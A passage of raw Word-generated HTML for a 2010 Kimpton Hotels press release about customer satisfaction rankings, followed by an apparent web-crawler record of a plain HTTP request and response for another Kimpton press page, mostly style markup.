<w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables/> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:DontGrowAutofit/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}h1 {mso-style-link:"Heading 1 Char"; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; mso-bidi-font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS";}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.0in right 6.0in; font-size:11.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman";}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {mso-style-noshow:yes; mso-style-link:"Plain Text Char"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ascii-font-family:Calibri; mso-fareast-font-family:Calibri; mso-hansi-font-family:Calibri; mso-bidi-font-family:"Times New Roman"; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.Heading1Char {mso-style-name:"Heading 1 Char"; mso-style-locked:yes; mso-style-link:"Heading 1"; mso-ansi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; mso-ansi-language:EN-US; mso-fareast-language:EN-US; font-weight:bold; mso-bidi-font-weight:normal;}span.PlainTextChar {mso-style-name:"Plain Text Char"; mso-style-noshow:yes; mso-style-locked:yes; mso-style-link:"Plain Text"; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-ansi-language:EN-US; mso-fareast-language:EN-US;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;}--></style><!--[if gte mso 10]><style> /* Style Definitions */table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";}</style><![endif]--><!--[if gte mso 9]><xml> <o:shapedefaults v:ext="edit" spidmax="2050"/></xml><![endif]--><!--[if gte mso 9]><xml> <o:shapelayout v:ext="edit"> <o:idmap v:ext="edit" data="1"/> </o:shapelayout></xml><![endif]--></head><body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'><div class=Section1><p class=MsoNormal><span style='font-family:Arial;mso-bidi-font-family:Arial'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1025" type="#_x0000_t75" style='width:152pt; height:43pt'> <v:imagedata src="images/image001.jpg" o:title="Kimpton New Logo"/></v:shape><![endif]--><![if !vml]><img width=154 height=45src="images/image002.gif" v:shapes="_x0000_i1025"><![endif]><bstyle='mso-bidi-font-weight:normal'><o:p></o:p></b></span></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-size:16.0pt;font-family:Arial;mso-bidi-font-family:Arial'>FORIMMEDIATE RELEASE<o:p></o:p></span></b></p><p class=MsoNormal><b style='mso-bidi-font-weight:normal'><spanstyle='font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Media Contacts:</span></i><i style='mso-bidi-font-style:normal'><spanstyle='font-size:10.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p></o:p></span></i></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Baltz&amp; Company for Kimpton<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>MarlieseEngel Traver / 212-982-8300 x112 / <a href="mailto:mtraver@baltzco.com">mtraver@baltzco.com</a><br>Ilana Alperstein / 212-982-8300 x113 / <a href="mailto:ialperstein@baltzco.com">ialperstein@baltzco.com</a><o:p></o:p></span></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal><b><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>KimptonHotels &amp; Restaurants<o:p></o:p></span></b></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>StaceyEllis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>JamieLaw / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p><p class=MsoNormal align=center style='text-align:center'><spanstyle='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal align=center style='text-align:center'><b><spanstyle='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><span style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON RANKED #1 IN CUSTOMER SATISFACTION <o:p></o:p></span></b></p><p class=MsoNormal align=center style='text-align:center'><b style='mso-bidi-font-weight:normal'><i style='mso-bidi-font-style:normal'><span style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Boutique Hotel CompanySurpasses Luxury Competitors for Four Quarters<o:p></o:p></span></i></b></p><p class=MsoNormal align=center style='text-align:center'><b><spanstyle='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>SANFRANCISCO, Calif., April 5, 2010 &#8211; Kimpton Hotels &amp; Restaurants continuesto provide guests with superior care, despite the difficult travel climate, andhas garnered the top customer satisfaction score for the Upper Upscale segmentfrom the Market Metrix Hospitality Index (MMHI).&nbsp; Kimpton�s top score of 92.1percent for the fourth quarter of 2009 rounded out the company�s consistentfirst place rankings for each quarter of 2009, demonstrating its uniquecommitment to personalized service.<span style="mso-spacerun: yes">&nbsp;</span>Kimpton�s high customer satisfaction scores for all four quarters of2009 surpassed competitors across several segments, including many luxury hotelleaders.<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>�Lastyear was a difficult year for travelers and as a hospitality company, we areproud to garner this distinction from the very people that matter most, ourguests,� said Niki Leondakis, chief operating officer, Kimpton Hotels &amp;Restaurants.&nbsp; �Ensuring travelers feel special and cared for, particularlyduring challenging times, is our first priority.� <o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>Based on35,000 in-depth customer interviews conducted each quarter by MMHI, Kimpton�s topcustomer satisfaction score reflects the company�s ongoing commitment toinnovative hospitality and personalized guest service.<spanstyle="mso-spacerun: yes">&nbsp; </span>Newly developed employee trainingcourses introduced throughout 2009 heightened attention and increased sensitivityto the changing needs of Kimpton guests in light of uncertain economic times,increased job demands, fewer resources and a tough travel environment.&nbsp; LoyalKimpton InTouch members were offered several new incentives in 2009, rangingfrom personalized promotions and exclusive deals to new ways to earncomplimentary stays at Kimpton hotels.<o:p></o:p></span></p><p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial'>&l..
- /pdfs/press/html/Sunday-Sleep-In-0410/

/pdfs/press/html/Sunday-Sleep-In-0410/

http://www.kimptonhotels.com/pdfs/press/html/Sunday-Sleep-In-0410/

Request

GET /pdfs/press/html/Sunday-Sleep-In-0410/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Sunday-Sleep-In-0410/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34141
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:LastPrinted>2010-05-10T18:00:00Z</o:LastPrinted>
<o:Created>2010-05-10T18:01:00Z</o:Created>
<o:LastSaved>2010-05-10T18:01:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>764</o:Words>
<o:Characters>4360</o:Characters>
<o:Lines>36</o:Lines>
<o:Paragraphs>8</o:Paragraphs>
<o:CharactersWithSpaces>5354</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:CustomDocumentProperties>
<o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle>
</o:CustomDocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:50331648 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
h2
{mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0in;
margin-bottom:3.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:2;
font-size:14.0pt;
font-family:Arial;
mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold;
font-style:italic;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
em
{mso-bidi-font-style:italic;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
span.emailstyle17
{mso-style-name:emailstyle17;
mso-style-noshow:yes;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:windowtext;}
span.kim10
{mso-style-name:kim10;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:1007153;
mso-list-type:hybrid;
mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.25in;
mso-level-number-position:left;
margin-left:.25in;
text-indent:-.25in;
mso-ansi-font-size:8.0pt;
font-family:Symbol;}
@list l2
{mso-list-id:102651134;
mso-list-type:hybrid;
mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l3
{mso-list-id:154613679;
mso-list-type:hybrid;
mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
